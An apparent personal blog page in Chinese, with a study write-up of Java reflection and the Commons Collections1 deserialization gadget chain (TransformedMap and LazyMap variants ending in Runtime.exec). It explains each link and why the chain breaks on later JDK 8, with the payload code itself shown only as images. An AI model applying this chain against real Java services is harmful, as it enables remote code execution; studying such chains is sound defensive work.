<h3 id="先来看正射"><a href="#先来看正射" class="headerlink" title="先来看正射"></a>先来看正射</h3><p>正射其实就是平时面向对象的流程,定义好一个类后,对他进行实例化。</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">Apple apple = <span class="keyword">new</span> Apple(); <span class="comment">//直接初始化,「正射」</span></span><br><span class="line">apple.setPrice(<span class="number">4</span>);</span><br></pre></td></tr></table></figure>
<h3 id="再来看反射"><a href="#再来看反射" class="headerlink" title="再来看反射"></a>再来看反射</h3><h4 id="反射加载类"><a href="#反射加载类" class="headerlink" title="反射加载类"></a>反射加载类</h4><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Class clz = Class.forName(<span class="string">"java.lang.String"</span>);</span><br></pre></td></tr></table></figure>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Class clz = String.class;</span><br></pre></td></tr></table></figure>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">String str = <span class="keyword">new</span> String(<span class="string">"Hello"</span>);</span><br><span class="line">Class clz = str.getClass();</span><br></pre></td></tr></table></figure>
<p>例: </p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">package</span> com.fanshe.demoClass;</span><br><span class="line"><span class="keyword">import</span> com.fanshe.demoClass.demoClass;</span><br><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">fanshe</span> </span>{</span><br><span class="line"> <span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> ClassNotFoundException </span>{</span><br><span class="line"><span class="comment">// 1.Class.forName(全类名)</span></span><br><span class="line"> Class<?> democlass = Class.forName(<span class="string">"com.fanshe.demoClass.demoClass"</span>);</span><br><span class="line"> System.out.println(democlass);</span><br><span class="line"><span class="comment">// 2.类名.class</span></span><br><span class="line"> Class<?> democlass2 = com.fanshe.demoClass.demoClass.class;</span><br><span class="line"> System.out.println(democlass2);</span><br><span class="line"><span class="comment">// 3.对象.getclass</span></span><br><span class="line"> demoClass democlass3 = <span class="keyword">new</span> demoClass();</span><br><span class="line"> Class<?> democlass4 = 
democlass3.getClass();</span><br><span class="line"> System.out.println(democlass4);</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<h4 id="获取类的公共方法"><a href="#获取类的公共方法" class="headerlink" title="获取类的公共方法"></a>获取类的公共方法</h4><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">getMethods()</span><br></pre></td></tr></table></figure>
<p>例如:</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title">demo2</span><span class="params">()</span> <span class="keyword">throws</span> ClassNotFoundException</span>{</span><br><span class="line"> Class<?> demo = Class.forName(<span class="string">"com.fanshe.demoClass.demoClass"</span>);</span><br><span class="line"> Method[] methods = demo.getMethods();</span><br><span class="line"> <span class="keyword">for</span>(Method method:methods){</span><br><span class="line"> System.out.println(method);</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<h4 id="获取类的所有方法"><a href="#获取类的所有方法" class="headerlink" title="获取类的所有方法"></a>获取类的所有方法</h4><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">getDeclaredMethods()</span><br></pre></td></tr></table></figure>
<p>例如</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title">demo2</span><span class="params">()</span> <span class="keyword">throws</span> ClassNotFoundException</span>{</span><br><span class="line"> Class<?> demo = Class.forName(<span class="string">"com.fanshe.demoClass.demoClass"</span>);</span><br><span class="line"> Method[] methods = demo.getDeclaredMethods();</span><br><span class="line"> <span class="keyword">for</span>(Method method:methods){</span><br><span class="line"> System.out.println(method);</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<h4 id="获取类的接口"><a href="#获取类的接口" class="headerlink" title="获取类的接口"></a>获取类的接口</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">getInterfaces()</span><br></pre></td></tr></table></figure>
<p>例如</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title">demo3</span><span class="params">()</span> <span class="keyword">throws</span> ClassNotFoundException</span>{</span><br><span class="line"> Class<?> demo = Class.forName(<span class="string">"com.fanshe.demoClass.demoClass"</span>);</span><br><span class="line"> Class<?>[] interfaces = demo.getInterfaces();</span><br><span class="line"> <span class="keyword">for</span>(Class<?> inter:interfaces){</span><br><span class="line"> System.out.println(inter);</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<h4 id="获取类的父类"><a href="#获取类的父类" class="headerlink" title="获取类的父类"></a>获取类的父类</h4><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">getSuperclass()</span><br></pre></td></tr></table></figure>
<p>例如</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title">demo4</span><span class="params">()</span> <span class="keyword">throws</span> ClassNotFoundException</span>{</span><br><span class="line"> Class<?> demo = Class.forName(<span class="string">"com.fanshe.demoClass.demoClass"</span>);</span><br><span class="line"> Class<?> superclass = demo.getSuperclass();</span><br><span class="line"> System.out.println(superclass);</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<h4 id="获取类的构造方法"><a href="#获取类的构造方法" class="headerlink" title="获取类的构造方法"></a>获取类的构造方法</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">getConstructors()</span><br></pre></td></tr></table></figure>
<p>例如</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title">demo4</span><span class="params">()</span> <span class="keyword">throws</span> ClassNotFoundException</span>{</span><br><span class="line"> Class<?> demo = Class.forName(<span class="string">"com.fanshe.demoClass.demoClass"</span>);</span><br><span class="line"> Constructor<?>[] constructors = demo.getConstructors();</span><br><span class="line"> <span class="keyword">for</span>(Constructor constructor:constructors){</span><br><span class="line"> System.out.println(constructor);</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<h4 id="获取类的公共属性"><a href="#获取类的公共属性" class="headerlink" title="获取类的公共属性"></a>获取类的公共属性</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">getFields()</span><br></pre></td></tr></table></figure>
<p>例如</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title">demo4</span><span class="params">()</span> <span class="keyword">throws</span> ClassNotFoundException</span>{</span><br><span class="line"> Class<?> demo = Class.forName(<span class="string">"com.fanshe.demoClass.demoClass"</span>);</span><br><span class="line"> Field[ ] fields = demo.getFields();</span><br><span class="line"> <span class="keyword">for</span>(Field field:fields){</span><br><span class="line"> System.out.println(field);</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<h4 id="获取类的所有属性"><a href="#获取类的所有属性" class="headerlink" title="获取类的所有属性"></a>获取类的所有属性</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">getDeclaredFields()</span><br></pre></td></tr></table></figure>
<p>例如</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title">demo4</span><span class="params">()</span> <span class="keyword">throws</span> ClassNotFoundException</span>{</span><br><span class="line"> Class<?> demo = Class.forName(<span class="string">"com.fanshe.demoClass.demoClass"</span>);</span><br><span class="line"> Field[ ] DeclaredFields = demo.getDeclaredFields();</span><br><span class="line"> <span class="keyword">for</span>(Field DeclaredField:DeclaredFields){</span><br><span class="line"> System.out.println(DeclaredField);</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<h2 id="二、Commons-Collections1反射链"><a href="#二、Commons-Collections1反射链" class="headerlink" title="二、Commons Collections1反射链"></a>二、Commons Collections1反射链</h2><h3 id="1、TransformedMap链"><a href="#1、TransformedMap链" class="headerlink" title="1、TransformedMap链"></a>1、TransformedMap链</h3><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">ObjectInputStream.readObject()</span><br><span class="line"> AnnotationInvocationHandler.readObject()</span><br><span class="line"> TransformedMap.setValue()</span><br><span class="line"> ChainedTransformer.transform()</span><br><span class="line"> ConstantTransformer.transform()</span><br><span class="line"> InvokerTransformer.transform()</span><br><span class="line"> Method.invoke()</span><br><span class="line"> Class.getMethod()</span><br><span class="line"> InvokerTransformer.transform()</span><br><span class="line"> Method.invoke()</span><br><span class="line"> Runtime.getRuntime()</span><br><span class="line"> InvokerTransformer.transform()</span><br><span class="line"> Method.invoke()</span><br><span class="line"> Runtime.exec()</span><br></pre></td></tr></table></figure>
<h4 id="Transformer"><a href="#Transformer" class="headerlink" title="Transformer"></a>Transformer</h4><p><img src="../images1/1.png" alt="image-20211028101957232"></p>
<h4 id="InvokerTransformer"><a href="#InvokerTransformer" class="headerlink" title="InvokerTransformer"></a>InvokerTransformer</h4><p>Transformer接口的实现类,其transform方法可以通过反射机制执行任意代码</p>
<p><img src="../images1/2.png" alt="image-20211028102033245"></p>
<h4 id="ConstantTransformer"><a href="#ConstantTransformer" class="headerlink" title="ConstantTransformer"></a>ConstantTransformer</h4><p>Transformer接口的实现类,其transform方法直接返回当前对象</p>
<p><img src="../images1/3.png" alt="image-20211028102115286"></p>
<h4 id="ChainedTransformer"><a href="#ChainedTransformer" class="headerlink" title="ChainedTransformer"></a>ChainedTransformer</h4><p>Transformer接口的实现类,其transform方法遍历iTransformers中每一个对象,调用其transform方法</p>
<p><img src="../images1/4.png" alt="image-20211028102151623"></p>
<h4 id="TransformedMap"><a href="#TransformedMap" class="headerlink" title="TransformedMap"></a>TransformedMap</h4><p>AbstractInputCheckedMapDecorator的实现类,其decorate方法会把Transformer接口的实现类绑定到Map上,对Map进行操作时,会调用其transform方法</p>
<p><img src="../images1/5.png" alt="image-20211028102456828"></p>
<h3 id="2、ysoserial-Commons-Collections1链"><a href="#2、ysoserial-Commons-Collections1链" class="headerlink" title="2、ysoserial Commons Collections1链"></a>2、ysoserial Commons Collections1链</h3><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">ObjectInputStream.readObject()</span><br><span class="line"> AnnotationInvocationHandler.readObject()</span><br><span class="line"> Map(Proxy).entrySet()</span><br><span class="line"> AnnotationInvocationHandler.invoke()</span><br><span class="line"> LazyMap.get()</span><br><span class="line"> ChainedTransformer.transform()</span><br><span class="line"> ConstantTransformer.transform()</span><br><span class="line"> InvokerTransformer.transform()</span><br><span class="line"> Method.invoke()</span><br><span class="line"> Class.getMethod()</span><br><span class="line"> InvokerTransformer.transform()</span><br><span class="line"> Method.invoke()</span><br><span class="line"> Runtime.getRuntime()</span><br><span class="line"> InvokerTransformer.transform()</span><br><span class="line"> Method.invoke()</span><br><span class="line"> Runtime.exec()</span><br></pre></td></tr></table></figure>
<h4 id="LazyMap"><a href="#LazyMap" class="headerlink" title="LazyMap"></a>LazyMap</h4><p>和TransformedMap一样是AbstractInputCheckedMapDecorator的实现类,区别是使用get去触发transform</p>
<p><img src="../images1/12.png" alt="image-20211028170741543"></p>
<h4 id="AnnotationInvocationHandler-invoke"><a href="#AnnotationInvocationHandler-invoke" class="headerlink" title="AnnotationInvocationHandler.invoke"></a>AnnotationInvocationHandler.invoke</h4><p>该类的初始化传入两个参数,第二个参数为Map类,赋值给成员变量memberValues,invoke方法中调用了get方法</p>
<p><img src="../images1/14.png" alt="image-20211028223057484"></p>
<h4 id="Map-Proxy-entrySet"><a href="#Map-Proxy-entrySet" class="headerlink" title="Map(Proxy).entrySet()"></a>Map(Proxy).entrySet()</h4><p>Map.entrySet()的作用是把HashMap类型的数据转换成集合类型,这里重点是Proxy,他是一个代理对象,如果代理的是AnnotationInvocationHandler,那么代理对象调用任何函数,都会执行一次代理类的invoke函数</p>
<h4 id="AnnotationInvocationHandler-readObject"><a href="#AnnotationInvocationHandler-readObject" class="headerlink" title="AnnotationInvocationHandler.readObject"></a>AnnotationInvocationHandler.readObject</h4><p>在8u171之前,该方法中调用了成员变量memberValues的entrySet方法,而该成员变量就是我们传入的代理对象,即可完成整个链</p>
<p><img src="../images1/15.png" alt="image-20211028225033802"></p>
<h2 id="三、逐级触发"><a href="#三、逐级触发" class="headerlink" title="三、逐级触发"></a>三、逐级触发</h2><h3 id="1、InvokerTransformer"><a href="#1、InvokerTransformer" class="headerlink" title="1、InvokerTransformer"></a>1、InvokerTransformer</h3><p>直接用InvokerTransformer去命令执行,此时我们直接赋值了Runtime.getRuntime()实例,主动触发了transform,利用其中的getMethod方法,获得exec方法,并执行。实际上在反射时我们只能传入一个Runtime.class,只能执行ReadObject方法,寻找调用了transform方法的类</p>
<h3 id="2、ChainedTransformer"><a href="#2、ChainedTransformer" class="headerlink" title="2、ChainedTransformer"></a><img src="../images1/6.png" alt="image-20211028102559894">2、ChainedTransformer</h3><p>该类中的transform方法会循环调用Transformer接口数组中的每一个实现类的transform,并将上一个循环的输出作为下一个循环的输入。前一次我们传入的是Runtime.getRuntime()实例,但是其实我们只能传入Runtime.class,还要获得getMethod、getRuntime、invoke和exec,而ChainedTransformer类中transform方法,刚好适配</p>
<p><img src="../images1/7.png" alt="image-20211028105010299"></p>
<h3 id="3、ConstantTransformer"><a href="#3、ConstantTransformer" class="headerlink" title="3、ConstantTransformer"></a>3、ConstantTransformer</h3><p>上一次是调用transform方法时直接传入了Runtime.class,这是不现实的,反序列化只要ReadObject就好了,该类也是Transform接口的实现类,利用其transform方法,直接返回一个Runtime.class,这样只需new对象的时候赋值即可,上层的transform就不用传参数了</p>
<p><img src="../images1/8.png" alt="image-20211028113152639"></p>
<h3 id="4、TransformedMap"><a href="#4、TransformedMap" class="headerlink" title="4、TransformedMap"></a>4、TransformedMap</h3><p>使用TransformedMap进行命令执行,其put的方法对Map键值进行修改,导致执行transform</p>
<p><img src="../images1/11.png" alt="image-20211028163337333"></p>
<h3 id="5、LazyMap"><a href="#5、LazyMap" class="headerlink" title="5、LazyMap"></a>5、LazyMap</h3><p><img src="../images1/13.png" alt="image-20211028171120488"></p>
<h3 id="6、Map-Proxy-entrySet-—-gt-invoke"><a href="#6、Map-Proxy-entrySet-—-gt-invoke" class="headerlink" title="6、Map(Proxy).entrySet()—>invoke"></a>6、Map(Proxy).entrySet()—>invoke</h3><p><img src="../images1/17.png" alt="image-20211028232559014"></p>
<h3 id="7、readObject—-gt-Map-Proxy-失败"><a href="#7、readObject—-gt-Map-Proxy-失败" class="headerlink" title="7、readObject—>Map(Proxy)失败"></a>7、readObject—>Map(Proxy)失败</h3><p><img src="../images1/16.png" alt="image-20211028225433837"></p>
<p>调试时在invoke函数的get方法处打一个断点,能看到此时的memberValues为LinkedHashMap类,并不是原本传入的LazyMap</p>
<p><img src="../images1/18.png" alt="image-20211028234416294"></p>
<p>因为jdk8中去掉了defaultReadObject,而改为单独填充新变量,导致memberValues为LinkedHashMap对象,报错</p>
<p><img src="../images1/19.png" alt="image-20211028234441744"></p>
<h2 id="四、疑惑"><a href="#四、疑惑" class="headerlink" title="四、疑惑"></a>四、疑惑</h2><h3 id="问题1:new一个Transform接口的数组"><a href="#问题1:new一个Transform接口的数组" class="headerlink" title="问题1:new一个Transform接口的数组?"></a>问题1:new一个Transform接口的数组?</h3><p>接口不能new,这里new的数组里面存储的是实现了Transform接口的对象</p>
<h3 id="问题2:InvokerTransformer里有getMethod了,还要getMethod-getMethod-?"><a href="#问题2:InvokerTransformer里有getMethod了,还要getMethod-getMethod-?" class="headerlink" title="问题2:InvokerTransformer里有getMethod了,还要getMethod(getMethod)?"></a>问题2:InvokerTransformer里有getMethod了,还要getMethod(getMethod)?</h3><p>照我的理解,既然InvokerTransformer有getMethod,那直接用他的getMethod去获取getRuntime就好了,但是报错显示java.lang.class里没有getRuntime,</p>
<p>Java.lang.class.getMethod(getRuntime).invoke(Runtime.class)</p>
<p>Java.lang.class.getMethod(getMethod).invoke(Runtime.class,getRuntime)</p>
<p><img src="../images1/10.png" alt="image-20211028155914985"></p>
<p><img src="../images1/9.png" alt="image-20211028140433511"></p>
<p>如果直接用getMethod获得getRuntime,则此时是java.lang.class去getMethod获得getRuntime,java.lang.class里肯定是没有getRuntime的,报错。</p>
<p>而若让java.lang.class去getMethod获得getMethod,返回的是封装了getMethod方法的Method对象,再利用invoke,并传入参数Runtime.class和getRuntime,则刚好执行了Runtime.class.getMethod(getRuntime),返回了一个封装了getRuntime方法的Method对象,只要再执行一次invoke就可以获得Runtime.getRuntime实例</p>
<h2 id="五、思考"><a href="#五、思考" class="headerlink" title="五、思考"></a>五、思考</h2><p>在我眼里,PHP反序列化的挖掘思路其实就是从反序列化的入口,找遍所有魔术方法,找到能命令执行的链。</p>
<p>但是在JAVA反序列化里这个思路不可行,JAVA反序列化的魔术方法出现的不多,它只有反序列化的入口ReadObject,具体反序列化时调用了哪些方法是可利用的,这个无从考究,但是要一个方法一个方法去看,工作量未免太大。</p>
<p>但是这也有他的好处,当一个方法ban了,可能他只修复了当前类的方法,我们仍旧可以从原链中调用的函数里拼拼凑凑找到其他可以最终用来利用的函数,去年的weblogic就是如此。</p>
<h2 id="七、参考"><a href="#七、参考" class="headerlink" title="七、参考"></a>七、参考</h2><p><a target="_blank" rel="noopener" href="https://blog.csdn.net/weixin_39600331/article/details/111677314">https://blog.csdn.net/weixin_39600331/article/details/111677314</a></p>
<p><a target="_blank" rel="noopener" href="https://www.cnblogs.com/nice0e3/p/13791793.html">https://www.cnblogs.com/nice0e3/p/13791793.html</a></p>
</div>
<footer class="post-footer">
<div class="post-eof"></div>
</footer>
</article>
<article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
<link itemprop="mainEntityOfPage" href="http://example.com/2021/02/22/Test/">
<span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
<meta itemprop="image" content="/images/me.jpg">
<meta itemprop="name" content="GiDunPar">
<meta itemprop="description" content="">
</span>
<span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
<meta itemprop="name" content="GiDunPar's Blog">
</span>
<header class="post-header">
<h2 class="post-title" itemprop="name headline">
<a href="/2021/02/22/Test/" class="post-title-link" itemprop="url">Test</a>
</h2>
<div class="post-meta">
<span class="post-meta-item">
<span class="post-meta-item-icon">
<i class="far fa-calendar"></i>
</span>
<span class="post-meta-item-text">发表于</span>
<time title="创建时间:2021-02-22 22:00:57 / 修改时间:22:46:13" itemprop="dateCreated datePublished" datetime="2021-02-22T22:00:57+08:00">2021-02-22</time>
</span>
</div>
</header>
<div class="post-body" itemprop="articleBody">
<p><em>Demo blog~</em></p>
<p>Welcome my friends</p>
</div>
<footer class="post-footer">
<div class="post-eof"></div>
</footer>
</article>
</div>
<script>
// Restore the comment tab that was active last time the page was viewed.
// Fires once the NexT tab widget has registered itself; when
// CONFIG.comments.storage is on, the value remembered in localStorage wins
// over the configured default tab.
window.addEventListener('tabs:register', () => {
  let activeClass = CONFIG.comments.activeClass;
  if (CONFIG.comments.storage) {
    // localStorage is same-origin; an unset/empty entry falls back to the configured class.
    activeClass = localStorage.getItem('comments_active') || activeClass;
  }
  if (!activeClass) return;
  const activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
  if (activeTab) activeTab.click();
});

// Persist the clicked comment tab so the choice survives reloads.
// Only wired up when CONFIG.comments.storage is enabled at load time.
if (CONFIG.comments.storage) {
  const rememberTab = event => {
    const pane = event.target;
    if (!pane.matches('.tabs-comment .tab-content .tab-pane')) return;
    // NOTE(review): stores the pane's second class; presumably the first is
    // "tab-pane" and the second names the comment system — confirm against the theme markup.
    localStorage.setItem('comments_active', pane.classList[1]);
  };
  window.addEventListener('tabs:click', rememberTab);
}
</script>
</div>
<div class="toggle sidebar-toggle">
<span class="toggle-line toggle-line-first"></span>
<span class="toggle-line toggle-line-middle"></span>
<span class="toggle-line toggle-line-last"></span>
</div>
<aside class="sidebar">
<div class="sidebar-inner">
<ul class="sidebar-nav motion-element">
<li class="sidebar-nav-toc">
文章目录
</li>
<li class="sidebar-nav-overview">
站点概览
</li>
</ul>
<!--noindex-->
<div class="post-toc-wrap sidebar-panel">
</div>
<!--/noindex-->
<div class="site-overview-wrap sidebar-panel">
<div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
<img class="site-author-image" itemprop="image" alt="GiDunPar"
src="/images/me.jpg">
<p class="site-author-name" itemprop="name">GiDunPar</p>
<div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
<nav class="site-state">
<div class="site-state-item site-state-posts">
<a href="/archives/">
<span class="site-state-item-count">3</span>
<span class="site-state-item-name">日志</span>
</a>
</div>
</nav>
</div>
</div>
<iframe title="网易云音乐播放器" frameborder="no" border="0" marginwidth="0" marginheight="0" width="330" height="86" loading="lazy" src="https://music.163.com/outchain/player?type=2&amp;id=20954632&amp;auto=1&amp;height=66"></iframe>
</div>
</aside>
<div id="sidebar-dimmer"></div>
</div>
</main>
<footer class="footer">
<div class="footer-inner">
<div class="copyright">
©
<span itemprop="copyrightYear">2021</span>
<span class="with-love">
<i class="fa fa-heart"></i>
</span>
<span class="author" itemprop="copyrightHolder">GiDunPar</span>
<div>
<a target="_blank" rel="noopener" href="https://beian.miit.gov.cn/">闽ICP备2021002925号-1</a>
</div>
</div>
<!--
<div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://pisces.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Pisces</a> 强力驱动
</div>
-->
</div>
</footer>
</div>
<script color='0,0,0' opacity='0.99' zIndex='-1' count='99' src="/lib/canvas-nest/canvas-nest.min.js"></script>
<script size="300" alpha="0.6" zIndex="-1" src="/lib/canvas-ribbon/canvas-ribbon.js"></script>
<script src="/lib/anime.min.js"></script>
<script src="/lib/velocity/velocity.min.js"></script>
<script src="/lib/velocity/velocity.ui.min.js"></script>
<script src="/js/utils.js"></script>
<script src="/js/motion.js"></script>
<script src="/js/schemes/pisces.js"></script>
<script src="/js/next-boot.js"></script>
</body>
</html>